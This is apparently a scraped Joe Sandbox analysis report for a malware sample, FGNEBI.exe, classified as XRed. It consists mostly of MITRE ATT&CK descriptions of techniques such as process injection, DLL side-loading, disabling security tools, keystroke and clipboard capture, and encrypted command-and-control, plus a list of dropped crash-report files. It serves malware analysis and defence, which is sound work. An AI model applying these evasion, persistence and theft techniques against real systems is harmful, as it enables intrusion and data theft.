Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FGNEBI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3289285f9ad88d50b4ec103b7b95cad4d32d02d_455b7b6e_70295550-d48a-43c5-8063-7de24d3860e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3289285f9ad88d50b4ec103b7b95cad4d32d02d_455b7b6e_c4d3ea59-314f-4a4b-9798-81e07d2df517\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_56f1e7e6dd49e686cdf4ffd820ded92baa13c65_455b7b6e_bcaafa29-1e2e-4016-a48d-690b7846b00a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AEB.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DBC.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2B9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA54A.tmp.WERInternalMetadata.xml

Windows Analysis Report
FGNEBI.exe

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre